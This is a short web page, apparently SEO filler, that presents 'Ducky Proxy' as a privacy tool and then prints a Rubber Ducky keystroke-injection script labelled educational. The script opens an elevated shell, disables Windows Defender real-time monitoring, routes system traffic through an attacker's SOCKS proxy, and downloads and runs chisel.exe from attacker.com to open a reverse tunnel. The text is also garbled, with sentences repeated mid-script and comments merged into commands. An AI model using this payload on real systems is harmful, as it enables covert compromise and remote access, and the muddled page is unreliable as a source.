Ducky - Proxy

While many proxies exist, Ducky Proxy has carved out a niche for itself for several key reasons:

Your IP address is like your digital home address. Every time you visit a site, you leave a calling card. Ducky Proxy hides this address, making it much harder for third parties to track your browsing habits or physical location.

For educational purposes, a simple Ducky Proxy script for Windows might look like this (using Ducky Script 3.0): ducky proxy

REM Title: Ducky Proxy - SOCKS Tunneling via Netsh
DELAY 3000
GUI r
DELAY 500
STRING cmd
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 500

REM Disable Windows Defender Real-time Monitoring STRING powershell Set-MpPreference -DisableRealtimeMonitoring $true ENTER DELAY 500

REM Configure WinHTTP Proxy to attacker's SOCKS server (Listens on 127.0.0.1:9050 after SSH) STRING netsh winhttp set proxy proxy-server="socks=192.168.1.50:1080" bypass-list="*.local" ENTER DELAY 500 While many proxies exist, Ducky Proxy has carved

REM Optional: Download and run a stunnel or Chisel client for encrypted proxy STRING powershell Invoke-WebRequest -Uri "http://attacker.com/chisel.exe" -OutFile "$env:temp\chisel.exe" ENTER DELAY 1000 STRING $env:temp\chisel.exe client attacker.com:8000 R:socks ENTER

REM Cleanup: Hide the windows STRING exit ENTER For educational purposes, a simple Ducky Proxy script